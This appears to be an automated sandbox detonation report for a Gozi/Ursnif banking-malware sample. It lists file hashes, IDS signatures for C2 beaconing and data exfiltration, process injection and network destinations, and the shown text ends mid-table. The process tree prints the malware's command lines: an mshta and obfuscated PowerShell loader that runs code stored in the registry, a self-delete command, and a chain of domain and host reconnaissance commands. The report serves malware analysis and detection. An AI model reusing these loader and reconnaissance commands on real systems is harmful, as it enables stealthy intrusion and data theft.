| SHA256 | 1c67ad23f21bde03b5a6370531bed0a66e66ca693face7191ee1daa4f89a9969 |
| SHA512 | 4e661e952270f9cb23ebdc68f06d39bd26984c840956933c427e6cbe3c63c9dfb91f5f989cafbabeb1b5386800c01cc7be3eea1932f4235d21ace17b07297a0f |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 16a78e06ec1b6b7397cd605b06803c30 |
| SHA1 | 9cd7393bb635ac0b2bee2bd49a06c61c182abeb5 |
| SHA256 | 1c67ad23f21bde03b5a6370531bed0a66e66ca693face7191ee1daa4f89a9969 |
| SHA512 | 4e661e952270f9cb23ebdc68f06d39bd26984c840956933c427e6cbe3c63c9dfb91f5f989cafbabeb1b5386800c01cc7be3eea1932f4235d21ace17b07297a0f |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | dd5f14eb370daa1154aae7d403b47491 |
| SHA1 | 6378a5a8b8a8e727e83bff849a88a1ca2ba4308a |
| SHA256 | 9b4c1cdd57a81d15681599299de0f987d45ced8c0951384f3d644e72ce35456f |
| SHA512 | 8b12b725947cfdb87f30dda9100786c50ce7144103ce3f17398335a0bfa82dec8f469259916959ae164633576c8648db4bb83bdf27ee998b040cba369995852d |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | dd5f14eb370daa1154aae7d403b47491 |
| SHA1 | 6378a5a8b8a8e727e83bff849a88a1ca2ba4308a |
| SHA256 | 9b4c1cdd57a81d15681599299de0f987d45ced8c0951384f3d644e72ce35456f |
| SHA512 | 8b12b725947cfdb87f30dda9100786c50ce7144103ce3f17398335a0bfa82dec8f469259916959ae164633576c8648db4bb83bdf27ee998b040cba369995852d |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 149dff51cd2f314a298e771fc72d03f0 |
| SHA1 | c7caa03e052c647a898afaad47b002aa9534cb41 |
| SHA256 | debf0f9197fc77deffee03e5df0bebb537557ae76cd8d0f41d9c1f6c2cac5d07 |
| SHA512 | e71ae092062b36bf4ce6024a1c26b7653b8d487dd819c68c4db408d0dff4d7c65edc0eda51d91b70225c06dd85e79595404065471b8dc183c7962ad8e8bb50e3 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 149dff51cd2f314a298e771fc72d03f0 |
| SHA1 | c7caa03e052c647a898afaad47b002aa9534cb41 |
| SHA256 | debf0f9197fc77deffee03e5df0bebb537557ae76cd8d0f41d9c1f6c2cac5d07 |
| SHA512 | e71ae092062b36bf4ce6024a1c26b7653b8d487dd819c68c4db408d0dff4d7c65edc0eda51d91b70225c06dd85e79595404065471b8dc183c7962ad8e8bb50e3 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 8652b48a8ac9bade20c83603a6a3bbf2 |
| SHA1 | 35ac2762e5ffbffc690bcdd89542772a6efcbf47 |
| SHA256 | edc82ced7fc0ead27d01b73c2cb86955d549d24e732c879aa6a1a99e9b42dc27 |
| SHA512 | 2efaadd046333fa70336e0827763ea234e244659e2038e75af0d5a52f907743ed280775bf0e437850464612c55644952a889fd28c89d5f37033af52fa1f5676b |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 8652b48a8ac9bade20c83603a6a3bbf2 |
| SHA1 | 35ac2762e5ffbffc690bcdd89542772a6efcbf47 |
| SHA256 | edc82ced7fc0ead27d01b73c2cb86955d549d24e732c879aa6a1a99e9b42dc27 |
| SHA512 | 2efaadd046333fa70336e0827763ea234e244659e2038e75af0d5a52f907743ed280775bf0e437850464612c55644952a889fd28c89d5f37033af52fa1f5676b |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | e1c7d08d1a02ec4b5902108cfb38d71a |
| SHA1 | 2b0654d63707264359ee4d85cf7582c7504dbfb7 |
| SHA256 | 4c54aff7706e1968b6a8388cd4f95027cb6d013ef344a656dfec7cfc6e7f5674 |
| SHA512 | 8b088198d14fa36cafac610248a6ea58af38479fe7ce83f6aa6aba241e2fffafd14f59875278d46515834e9736cf4546f7c459197b6a15026dc139ba54bf2169 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 1b270ce8cf689665501cd3cd4586e95c |
| SHA1 | 4b990085f8e17dbc6b6b157ce334883cb92a2738 |
| SHA256 | 1a91e7e5e7a8612a3477f95645a4905f836e5ce3d54c76cb977c4b669dd945b1 |
| SHA512 | 8618d2f30121b4e5a406ac4f09f4f892416912370478366ac4c4335950a78722fbf39474c522406f1ac63e4b53d3cf8131674b4edaef047dbcd075ee2cfbfbde |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | f470aea6bd5fb67af38da048a704d25a |
| SHA1 | ce9b0d5ccb04bd7f0b253a28a0d7d3882a53b22a |
| SHA256 | 5fbf831cc3ba5c301eadcf6627b7f698de1cb1312bc4a38e068a33a8ede755dc |
| SHA512 | d4e3807a9bdc89a0ae420a990823831c86def88ef45d024f1c5012914a93a718461bd08ce0c85019bb7ba596b3ac0077a98c0d09eb18366b236ebcaccf9bd80e |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | f470aea6bd5fb67af38da048a704d25a |
| SHA1 | ce9b0d5ccb04bd7f0b253a28a0d7d3882a53b22a |
| SHA256 | 5fbf831cc3ba5c301eadcf6627b7f698de1cb1312bc4a38e068a33a8ede755dc |
| SHA512 | d4e3807a9bdc89a0ae420a990823831c86def88ef45d024f1c5012914a93a718461bd08ce0c85019bb7ba596b3ac0077a98c0d09eb18366b236ebcaccf9bd80e |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 43bb3e188b907f67d3f0728a3abe86b0 |
| SHA1 | 01f3cd381178ee0aa705519c1f911927eefd03e3 |
| SHA256 | 0baf37a662ae1feffebc8c90324254ca595e57445a57fa3aa664e7a51e96481a |
| SHA512 | cffee1c046ac112c886c54b74834be5fee02345cedad997ed9786bea41ad46cc2141411222f5abe7cbcd58c3fd3e1d3bf2b1b36b2b716a7f29bb29945e172988 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 43bb3e188b907f67d3f0728a3abe86b0 |
| SHA1 | 01f3cd381178ee0aa705519c1f911927eefd03e3 |
| SHA256 | 0baf37a662ae1feffebc8c90324254ca595e57445a57fa3aa664e7a51e96481a |
| SHA512 | cffee1c046ac112c886c54b74834be5fee02345cedad997ed9786bea41ad46cc2141411222f5abe7cbcd58c3fd3e1d3bf2b1b36b2b716a7f29bb29945e172988 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | d15862389eff4bb86ffc4a86522d6eb0 |
| SHA1 | 2c9a9985047ce668e41664e0bfb614782653d549 |
| SHA256 | 414b90c0d1a9737e3514ef6099b21985ebdd9806a4c82b2bf6bb36d19df3709e |
| SHA512 | 3342ce49cc5f5664952c7b3a48045c6755ae7dc9ac4516747540cc5771147e1895fc7ccfeb941f3500d3b9859b37d482c742520c62bde5fddec29db3231a0127 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | ea78941d66ce1a78a5640b3c1c9257e7 |
| SHA1 | 956198310c55526e63caab19205f31fbe8bd062c |
| SHA256 | 5f589cd87449ebd2cdaf1722a8599143160248d8fc06de713fb5f30e4999f71d |
| SHA512 | 38854c4ea93a20879d500b0d9b7bf4c293f4f182fd90d4ad458929d342cdd5dffe0521384891a9402c7ff65f2f874d59381358550149ae9b15f56d5f7c26fff2 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | eb1ca90d92b48fefcd626765be857e77 |
| SHA1 | 3ae215030b91bb7797fe5553bc1159f5b38aaeec |
| SHA256 | 04da1e451255b69f882781c81c3b2b4056c423da3d138c6ccccf24007fe24427 |
| SHA512 | a8436a836a673c6a0ecd33a786c21618cfef5d5a584d9014a375b7248402076cf139f27228a3521560b412b3686cd546883f44ae3128140621e00c7860ed396e |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 75356e39c5810752c6bcc2358b38147b |
| SHA1 | 934186a988e41e9cdfcb28d871cdebb6dde234b7 |
| SHA256 | d3ce17c2f49a1b75d2afb5efd8100e41d0fa21aa457506fccd1c8f14251f43ce |
| SHA512 | bf5ccb8901387368cf0bb63af6866582c4cff577f065018ddac90df7140fd9702fa2f27220062f259daffe4de02e0479c84bab3790c8d857c5974ffa5e7766a6 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 8350188cb6b9b13dbe3fcc2b1e3d3a44 |
| SHA1 | 2db8ce4d9c4fd84727da79370d8f5f74f8509fb5 |
| SHA256 | 6a6cb08eba512b904886a54be0a7a11e8a703e81de97fbb13183195f2ba0bd15 |
| SHA512 | 6fa2b25bba27525b663b6d37c3cbc736fa6af67b8be668e7eda9f5e381166a9da9e252d61940f19a99141a8f810a3de9c909b8b6a51a9936a2f266af03582077 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin1
| MD5 | 8350188cb6b9b13dbe3fcc2b1e3d3a44 |
| SHA1 | 2db8ce4d9c4fd84727da79370d8f5f74f8509fb5 |
| SHA256 | 6a6cb08eba512b904886a54be0a7a11e8a703e81de97fbb13183195f2ba0bd15 |
| SHA512 | 6fa2b25bba27525b663b6d37c3cbc736fa6af67b8be668e7eda9f5e381166a9da9e252d61940f19a99141a8f810a3de9c909b8b6a51a9936a2f266af03582077 |
C:\Users\Admin\AppData\Local\Temp\B64C.bin
| MD5 | 8350188cb6b9b13dbe3fcc2b1e3d3a44 |
| SHA1 | 2db8ce4d9c4fd84727da79370d8f5f74f8509fb5 |
| SHA256 | 6a6cb08eba512b904886a54be0a7a11e8a703e81de97fbb13183195f2ba0bd15 |
| SHA512 | 6fa2b25bba27525b663b6d37c3cbc736fa6af67b8be668e7eda9f5e381166a9da9e252d61940f19a99141a8f810a3de9c909b8b6a51a9936a2f266af03582077 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-22 15:41
Reported
2022-03-22 15:47
Platform
win10v2004-en-20220113
Max time kernel
152s
Max time network
140s
Command Line
Signatures
Gozi, Gozi IFSB
suricata: ET MALWARE Ursnif Payload Request (cook32.rar)
suricata: ET MALWARE Ursnif Payload Request (cook64.rar)
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1268 set thread context of 1648 | N/A | C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe | C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe |
| PID 1464 set thread context of 3032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 3032 set thread context of 3428 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3032 set thread context of 5092 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 3032 set thread context of 3752 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3032 set thread context of 3944 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 5092 set thread context of 3440 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 3032 set thread context of 1036 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe
"C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dsq4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsq4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\PlayStop'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rnxokhs -value gp; new-alias -name ciaisbj -value iex; ciaisbj ([System.Text.Encoding]::ASCII.GetString((rnxokhs "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").StopLocal))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp" "c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp" "c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\d41d05cc157f874f89c574c74c0e2c58.exe"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\96B8.bi1"
C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\96B8.bi1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\48C0.bin1 > C:\Users\Admin\AppData\Local\Temp\48C0.bin & del C:\Users\Admin\AppData\Local\Temp\48C0.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 146.70.35.138:80 | 146.70.35.138 | tcp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| BE | 193.56.146.148:80 | 193.56.146.148 | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| CA | 67.43.234.14:80 | 67.43.234.14 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/1648-130-0x0000000000400000-0x000000000040D000-memory.dmp
memory/1648-132-0x0000000000400000-0x000000000040D000-memory.dmp
memory/1464-134-0x000001CE6D500000-0x000001CE6D522000-memory.dmp
memory/1464-136-0x000001CE6D570000-0x000001CE6D572000-memory.dmp
memory/1464-135-0x00007FFE88800000-0x00007FFE892C1000-memory.dmp
memory/1464-137-0x000001CE6D573000-0x000001CE6D575000-memory.dmp
memory/1464-138-0x000001CE6D576000-0x000001CE6D578000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.cmdline
| MD5 | 5a979e67dddaa99228c7175293fc1eae |
| SHA1 | bc74ded8feb8d35b9187fb042ec86f070def5be2 |
| SHA256 | 0ee7f42a19daf9bd351b13e131a687d01d6eb3ef2d36f9b1989a791e04ba6635 |
| SHA512 | 93d8ae2812a6381f948f60942e16c0a4dc79f81bda30542e766deedea0609c0ff1e8f088a513347523f6149fa3822165bec7ca6f1cf183f57795e954d6617cf9 |
\??\c:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.0.cs
| MD5 | 0b7537cf8128ca1320d7bf219bb65b46 |
| SHA1 | 33ca68f06067df84baa078137f1285102d30cb3a |
| SHA256 | 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8 |
| SHA512 | 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276 |
\??\c:\Users\Admin\AppData\Local\Temp\f52evw42\CSC7C797FB70504A3AADFE5CB713FF399D.TMP
| MD5 | 5a356841cee3723ea31b767cb4df7bcc |
| SHA1 | 7531ab1c49cd47fca70424f3ca8e207365e2f813 |
| SHA256 | df83ae873b7d994f5d15f4e6eda272852c8bff60fc0afda81b7d7aede28ae4cc |
| SHA512 | f3b81f9782461034224046381cfb234c63f3747ae818cfbe27154fc413d0eb5f009fc7f317ca548c9b0aa93d636ccfb7eae27464c9fc16a3258fede972488bce |
C:\Users\Admin\AppData\Local\Temp\RESC0DC.tmp
| MD5 | 827e7339672df98a60290e862c30aa5d |
| SHA1 | d609786846b2da9f51b09e4c8fa532fe869f5fa0 |
| SHA256 | d79ae6f85d7f7fc698882975a085de0998ebf40da70fbe2c15e87e18754173f2 |
| SHA512 | 8e7320fcc4692418aaaa11a3347a03f10eb7dc74c5be111c7cdcfe1d8e89f3bdf89b7360e43394a9ee3abc386556f2d9d915a15402ee06ff8e735c86948ce9ba |
C:\Users\Admin\AppData\Local\Temp\f52evw42\f52evw42.dll
| MD5 | 159b61ffa605f136dce2773789107eb3 |
| SHA1 | e91f4e9cba4232633048fca9285ac9fb2e1b9b7d |
| SHA256 | 2e1c7b393bd4f8ad6e51535fad23dbb7961cef20924629f74a1a9e9228968ebd |
| SHA512 | b8d5db1ec4e9b80b7de2b6d22d307eb2ffd94cd7bc5558d87b44d94e38c28d5fe26e6881b87f796e0618330db0163231ef341df6bbd47f0b49af5f166c1a15ac |
\??\c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.cmdline
| MD5 | e2ca7846ac32d4f3137380e1abd25e6d |
| SHA1 | 4de339ef464c08ba3abaf942ccd21a1b46becc8b |
| SHA256 | 73356f23bd5c3be9ebda888db18551004c8491e16ccd8c61ddfa441d56872b5c |
| SHA512 | b80859cda2f6115d9e5f48b18b324f9560d99f75d47431beaf4ae8dd86289e2a6cf26fdb0af0c9d93e8898158e8a231bb9be43f384f5476fe1ec22f9a3b5b84a |
\??\c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.0.cs
| MD5 | 35b3f48ba529849ae98e5f2c89b802f6 |
| SHA1 | e6ac7f0dff73e320ab7c09f5abb45dede87cfe81 |
| SHA256 | f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61 |
| SHA512 | b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153 |
\??\c:\Users\Admin\AppData\Local\Temp\hvjrxi0u\CSCF687E3C2E95F45A4B0A5E441CCFA80AC.TMP
| MD5 | 4433fa325327c3dc432b004316445d2c |
| SHA1 | 34ed95bd7ee384565565b556e2e30af03d5c1e2b |
| SHA256 | 55c13880c05d6e659f1380afbcbe6786225069d13984692546165a70e24dd8c2 |
| SHA512 | b4d3c993acb6157688bef173ecd0fa5fd6f3615e994e442b3accce491a48012c55f2c81412a70d2e5b68e726f2693b22f1ec5a38994780e28cf6af0db2b6223c |
C:\Users\Admin\AppData\Local\Temp\RESC1B7.tmp
| MD5 | 4286e43bfeb1e3387ac41f2b7b2db13c |
| SHA1 | 488fe590c37256f2e4b2c89c0eef4aa9274e7454 |
| SHA256 | 8a985360ae68a55e0e01021d3c19bee9854580a43a2ccd85d1698fc620d9828f |
| SHA512 | 10869dc8ebd47ed28572169bbb2145db24e9b466829078172d9a3cdf944bb9a92229750bb05d7fa122b86d9196946ed6beb673daa8ad9dec3db6e03e6f04d651 |
C:\Users\Admin\AppData\Local\Temp\hvjrxi0u\hvjrxi0u.dll
| MD5 | a42b7d75a369b2595356d134e95cd50d |
| SHA1 | 3fc915c11d99e3d2facc9bca395b6988af9183fd |
| SHA256 | 282bfcafe282fd7a0f6f0b1860024a2b3dca84e4ae2d88e59ae97649d9341642 |
| SHA512 | c05e85f4765a91cf04bc0a2cdceb772086ecb734848ca63bae6e744b91db61b7e1a5b568e81c02a43d91c780b565c65460ad435691dd20f62a9dfccf43be4a56 |
memory/1464-149-0x000001CE6D980000-0x000001CE6D9C4000-memory.dmp
memory/3428-150-0x0000022B56A00000-0x0000022B56A01000-memory.dmp
memory/3440-152-0x00000192B8590000-0x00000192B8591000-memory.dmp
memory/3944-151-0x0000016A15840000-0x0000016A15841000-memory.dmp
memory/3032-153-0x0000000002140000-0x0000000002141000-memory.dmp
memory/3032-154-0x00000000080B0000-0x0000000008168000-memory.dmp
memory/3428-155-0x0000022B56940000-0x0000022B569F8000-memory.dmp
memory/5092-156-0x000001F1BFA30000-0x000001F1BFA31000-memory.dmp
memory/5092-157-0x000001F1BFC60000-0x000001F1BFD18000-memory.dmp
memory/3752-158-0x00000204B1050000-0x00000204B1051000-memory.dmp
memory/3752-159-0x00000204B1960000-0x00000204B1A18000-memory.dmp
memory/3944-160-0x0000016A15C10000-0x0000016A15CC8000-memory.dmp
memory/3440-161-0x00000192B84D0000-0x00000192B8588000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\96B8.bi1
| MD5 | 6d779dd3915807d04f282a0d3a7fd7de |
| SHA1 | 4f8fc87e30faef4d9e444a545c6987f2ea4598c2 |
| SHA256 | dd8033fe667b54228ca97bab4e63499611f91930b95594568795710e1aa6eaf4 |
| SHA512 | d7caf47acdbd7ec12790f38360fc5758b48d8ca934c10c8e7596e5820743bc738ce90fc20e3140486769c149012af1c5a1d7bcdc18ba4c58c93a400515822d5f |
C:\Users\Admin\AppData\Local\Temp\96B8.bi1
| MD5 | 4f6429322fdfd711b81d8824b25fcd9c |
| SHA1 | f7f917b64dd43b620bacd21f134d430d3c406aec |
| SHA256 | d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8 |
| SHA512 | e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816 |
memory/1036-164-0x0000000000B26B20-0x0000000000B26B24-memory.dmp
memory/1036-165-0x00000000015A0000-0x000000000164A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\48C0.bin1
| MD5 | 056a1cd8b8b3c1cc08f23231deb47221 |
| SHA1 | a563acec40cfa68f6764ca8b6aa1f162782557e1 |
